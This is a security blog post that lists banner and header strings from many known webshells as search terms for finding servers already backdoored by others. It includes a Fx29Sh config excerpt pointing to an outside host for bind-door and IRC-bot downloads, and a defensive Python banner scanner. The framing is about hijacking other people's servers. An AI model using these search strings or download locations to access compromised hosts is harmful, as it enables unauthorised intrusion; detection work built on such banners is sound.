*FOR RESEARCH* How Easy is it to find Webshells and basically have Root/Admin or User Level Access without “Hacking” Anything – PART 1



********RESEARCH ONLY – DO NOT TRY ANYTHING I AM ABOUT TO DO AS YOU WILL MOST LIKELY END UP IN JAIL, I DO NOT ENDORSE NOR CONDONE DoS ATTACKS OR HACKING WEBSERVERS YOU DO NOT HAVE PERMISSION TO DO SO – HOWEVER IF THEY ARE AGAINST IRAN OR NORTH KOREA I WOULD LOOK THE OTHER WAY – I TAKE IN NO WAY RESPONSIBILITY FOR ANYTHING ILLEGAL YOU ARE ABLE TO DO WITH THIS INFORMATION *******

Like my phpDOS webshell-based botnet, which I built in a matter of minutes, I wondered whether I could take over servers that other hackers had already broken into and backdoored without protecting. So, to start the research, I set out to collect as many underground and publicly available webshells and backdoors as I could. That turned out to be far too easy: in about 30 minutes I had over 500 different webshell scripts to play with. I loaded them all onto my dedicated server to test them, see what they would look like in a live dump, and write some Snort rules for certain execution patterns. Now the fun part: let's try something simple, like grabbing the header text from a few of the files whose moron coders forgot to keep Google from indexing their backdoors.

Here are a few of the strings I began searching for:

################################
Php Backdoor v 1.0 by ^Jerem
################################
This backdoor coded in php allows
allows to control a web serv …
For use this script upload this
on the ftp server of the hacked
web site. Enjoy ^^

/**********************************************************/
/*                          CrystalShell v.1
/*                       --------- ---------
/*
/*       Coded by : Super-Crystal and Mohajer22
/*    ----------------------------------------
/*    Arab Security Center Team <---thanks
/*      mail : sup3r-hackers@hotmail.Com
/* october73 shell & CrystalShell < coding by super crystal
/*
/*********************************************************/
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
Crystal shell</title>

/*
DDDDD        SSSSS    DxShell    by î_Î Tync
D  D  X X   S
D  D   X    SSSSS    http://hellknights.void.ru/
D  D  X X       S    ICQ#244648
DDDDD        SSSSS
*/
$GLOB['SHELL']['Ver']='1.0b'; /* ver of the shell */
$GLOB['SHELL']['Date']='26.04.2006';

#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##
define('sh_ver',"2.0.09.08");        ##
## By FaTaLisTiCz_Fx                 ##
## © 03-09 2008 FeeLCoMz Community   ##
## Written under PHP 5.2.5           ##
#######################################
$sh_name = sh_name();                ##
#######################################
#$sh_mainurl        = "http://vidinas.net/templates/archzone/xml/cyberz.txt";
$sh_mainurl        = "http://vidinas.net/templates/archzone/xml/";
$fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
"Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
"psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
##[ AUTHENTICATION ]##
$auth = array(
"login"     => "",
"pass"      => "",
"md5pass"   => "",
"hostallow" => array("*"),
"denied"    => "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied!",
);
##[ END AUTHENTICATION ]##
$curdir = "./";
$tmpdir = "";
$tmpdir_logs = "./";
$log_email = "meister_onthelaw@yahoo.com";
$sess_cookie = "fx29shcook";
$sort_default = "0a"; # Sorting: 0 - column number, "a"scending or "d"escending
$sort_save = TRUE; # Save the sort position using cookies.
$usefsbuff = TRUE;
$copy_unset = FALSE; # Delete the copied file after it has been pasted

* <p>Title:JspWebshell </p>
*
* <p>Description: jsp website management</p>
*
* <p>Copyright: 绝对零度[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
*  PS: I wrote this program out of personal interest; if you have questions, contact QQ:48124012
* @version 1.2
*/

/+--------------------------------+\
|            KA_uShell           |
|    <KAdot Universal Shell>     |
|         Version 0.1.6          |
|            13.03.04            |
|  Author: KAdot <KAdot@ngs.ru>  |
|--------------------------------|
\+                                +/
-->
<title>KA_uShell 0.1.6</title>
<style type="text/css">

/*
* MySQL Web Interface Version 0.8
* -------------------------------
* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
* License : GNU Public License (GPL)
* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
*/
$HOSTNAME = "localhost";
function logon() {
    global $PHP_SELF;
    setcookie( "mysql_web_admin_username" );
    setcookie( "mysql_web_admin_password" );
    echo "<html>\n";
    echo "<head>\n";
    echo "<title>MySQL Web Interface</title>\n";
    echo "</head>\n";
    echo "<body>\n";
    echo "<table width=100% height=100%><tr><td><center>\n";
    echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
    echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
    echo "<h1>MySQL Web Interface</h1>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=logon_submit>\n";
    echo "<table cellpadding=5 cellspacing=1>\n";
    echo "<tr><td>Username </td><td> <input type=text
name=username></td></tr>\n";
    echo "<tr><td>Password </td><td> <input type=password
name=password></td></tr>\n";
    echo "</table><p>\n";
    echo "<input type=submit value='Enter'>\n";
    echo "<input type=reset value='Clear'><br>\n";
    echo "</form>\n";
    echo "</center></td></tr></table>\n";
    echo "</center></td></tr></table>\n";
    echo "<p><hr width=300>\n";
    echo "<font size=2>\n";
    echo "Copyleft &copy; since 1999,\n";
    echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
    echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is

##########################################################
# Small PHP Web Shell by ZaCo (c) 2004-2006                #
#  +POST method                                            #
#  +MySQL Client+Dumper for DB  and tables                 #
#  +PHP eval in text format and html for phpinfo() example #
# PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
# For antichat.ru and cup.su friends usage                 #
# All bugs -> mailo:zaco@yandex.ru                         #
# Just for fun 🙂                                          #
##########################################################

<title>Sosyete Safe Mode Bypass Shell – Edited By KingDefacer</title>
#/\/\/\/\/\  MulCiShell v0.2 – Edited By KingDefacer/\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)

*****************************************************************************************************************
*                           Safe0ver Shell – Safe Mod Bypass By Evilc0der – Edited By KingDefacer               *
*****************************************************************************************************************
*****************************************************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!   Attention! This script was written for educational purposes. We are not responsible for any illegal actions you carry out using it.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "Safe0ver";
$scriptident = "$scriptTitle By Evilc0der.com";

<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
<font color="#00FF00">Cr@zy_King&nbsp; </font>
Ru24PostWebShell
Writed by DreAmeRz
http://www.ru24-team.net
<title>Ru24PostWebShell – ".$_POST['cmd']."</title>

Default Changes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$owner        = "SR-Crew";                                                     Insert your nick
$version      = "2.0.0";                                                        The version

|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>

Script:
-=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=-
Name: PHPJackal
Version: 1.5
Author:
-=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=–=-
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru
Email: nima_501@yahoo.com
PHPJackal v1.5 – Powered By NetJackal
<!--  http://michaeldaw.org 2006 -->

/*###########################################
Shell
This shell's code was compiled by Megabros..
Maker and compiler: Megabros
###########################################*/

*
* lostDC shell
* PHP shell written by lostpassword, D3vilc0de crew
* Released under the GPL license 2009/2010
* Release date: 25/12/2009 (yes, I had nothing to do on Christmas day)
* The shell offers various functions, but is still being updated continuously
*
error_reporting(0);

Loader'z WEB Shell v 0.1.0.2 {15 August 2005}
Here are the functions it supports.
- Working with the file system through PHP. The contents of the current folder are shown in a convenient table (new in this version: permissions shown in the usual form rather than as a number :)).
- Code execution, PHP rules 😉

Coding by BLaSTER
from TurkGuvenligi
* iMHaPFTP.php – iMHaBiRLiGi PHP FTP Editor
* Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
*
* This code is entirely free software.
* It may be used as you wish, provided it is not used for malicious purposes.
* The program's purpose is to connect to your host without FTP and
* add and remove files.
* Our code is written in 6 languages. It selects automatically according to the server language.

<title>h4ntu shell [powered by tsoi]</title>
This Is The Server Information
echo "<title>Edited By KingDefacer</title><body>";

*************************
*  ###### ##### ######  *
*  ###### ##### ######  *
*  ##     ##    ##      *
*  ##     ####  ######  *
*  ##  ## ####  ######  *
*  ##  ## ##        ##  *
*  ###### ##    ######  *
*  ###### ##    ######  *
*                       *
* Group Freedom Search! *
*************************
GFS Web-Shell
FaTaLisTiCz_Fx Fx29SheLL v2.0.09.08
.: No System is Perfectly Safe :.

' Author: forever5pi (following the guide by vicki-vkdt)
' Email : forever5pi@yahoo.com
' Website: http://vnhacker.org
option explicit

/***************************************************************************
*                           Cyber Shell (v 1.0)
*                            -------------------
*   copyright            : (C) Cyber Lords, 2002-2006
*   email                : pixcher@mail.ru
*
*   http://www.cyberlords.net
*
*   Coded by Pixcher
*   Lite version of php web shell
***************************************************************************/
<title>Aria cPanel cracker version 1.0 – Edited By KingDefacer</title>
# Edited By KingDefacer

' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
' --- check for a command that we have posted --- '

str_replace('.','','P.h.p.S.p.y')
http://www.alturks.com str_replace('.','','P.h.p.S.p.y');?> Ver: 2008
<a href="javascript:goaction('logout');">Logout</a> |
<a href="javascript:goaction('file');">File Manager</a> |
<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
<a href="javascript:goaction('shell');">Execute Command</a> |
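The same header strings that make these shells findable from the outside make them findable from the inside: a defender who suspects a server has been backdoored can sweep the web root for the banners instead of waiting for a search engine to index them. The scanner below is an added example, not code from the original post or from any of the shell authors. It carries a handful of banner fragments copied from the headers above, walks a directory tree, and reports the file and line where each banner appears. The sample web root it builds is constructed inline so the script runs offline; the script-extension list and the 512 KiB read limit are my own choices, not anything the post specifies.

```python
"""Scan a web root for the webshell banner strings listed on this page.

Added example (not code from the original post). The signature strings are
copied from the shell headers above; the sample web root is constructed here
so the script runs offline.
"""
import os
import tempfile
from typing import Dict, List, Tuple

# Banner fragments copied from the shell headers on this page. They are
# matched case-insensitively as plain substrings, so new ones can be added
# without writing regular expressions.
BANNER_SIGNATURES: Dict[str, str] = {
    "jerem_backdoor": "Php Backdoor v 1.0 by ^Jerem",
    "crystalshell": "Coded by : Super-Crystal and Mohajer22",
    "dxshell": "DxShell",
    "fx29sh": "FaTaLisTiCz_Fx Fx29Sh",
    "ka_ushell": "KAdot Universal Shell",
    "zaco_shell": "Small PHP Web Shell by ZaCo",
    "kingdefacer_edit": "Edited By KingDefacer",
    "safe0ver": "Safe0ver Shell",
    "ru24postwebshell": "Ru24PostWebShell",
    "phpjackal": "PHPJackal",
    "cmdasp": "File: CmdAsp.asp",
    "phpspy_obfuscated": "P.h.p.S.p.y",
    "cyber_shell": "Cyber Shell (v 1.0)",
    "h4ntu": "h4ntu shell",
}

# Extension list is my own choice (assumption): a dropped shell is only useful
# if the server executes it, so only script-type files are opened.
SCRIPT_EXTENSIONS = (".php", ".php3", ".phtml", ".jsp", ".asp", ".aspx", ".cgi", ".pl")


def scan_text(text: str) -> List[Tuple[str, int]]:
    """Return (signature_name, line_number) for every banner found in text."""
    hits: List[Tuple[str, int]] = []
    lowered = text.lower()
    for name, banner in BANNER_SIGNATURES.items():
        idx = lowered.find(banner.lower())
        if idx != -1:
            # Line number is 1 + the number of newlines before the match.
            hits.append((name, text.count("\n", 0, idx) + 1))
    return hits


def scan_file(path: str, max_bytes: int = 512 * 1024) -> List[Tuple[str, int]]:
    """Scan the first max_bytes of a file; banners sit at the top of a shell."""
    with open(path, "rb") as fh:
        raw = fh.read(max_bytes)
    # Shell headers come in several encodings (windows-1256, cp1251 and GBK
    # all appear above); latin-1 maps every byte to one character, so no file
    # is skipped because of a decode error.
    return scan_text(raw.decode("latin-1"))


def scan_tree(root: str) -> Dict[str, List[Tuple[str, int]]]:
    """Walk a web root; return {relative_path: hits} for every flagged file."""
    findings: Dict[str, List[Tuple[str, int]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(SCRIPT_EXTENSIONS):
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_webroot() -> str:
    """Constructed sample tree: one clean page, two planted banner fragments,
    and a .txt file that carries a banner but is not a script."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "index.php": "<?php\n// ordinary site code\necho 'hello';\n",
        "templates/xml/cyberz.php": "<?php\n#######\n## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08 ##\n",
        "uploads/cmd.asp": "' File: CmdAsp.asp\n' Author: Maceo\n",
        "uploads/notes.txt": "Php Backdoor v 1.0 by ^Jerem (text file, not scanned)\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    webroot = build_sample_webroot()
    for path, hits in sorted(scan_tree(webroot).items()):
        for name, line in hits:
            print(f"{path}:{line}: {name}")
```

This only catches shells whose authors left the banner in place, which is exactly the population the post is about; a shell with the header stripped or the source encoded will pass unnoticed, so treat a clean sweep as one signal next to file-integrity hashes of the web root and the web server's own access logs rather than as proof of a clean host.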

See part 2 for the results:

http://www.computersecurity.org/cyber-security-training-learning-videos/web-application-attacks-website-app-attack/webshells/for-research-how-easy-is-it-to-find-webshells-and-basically-have-rootadmin-or-user-level-access-without-hacking-anything-part-2/


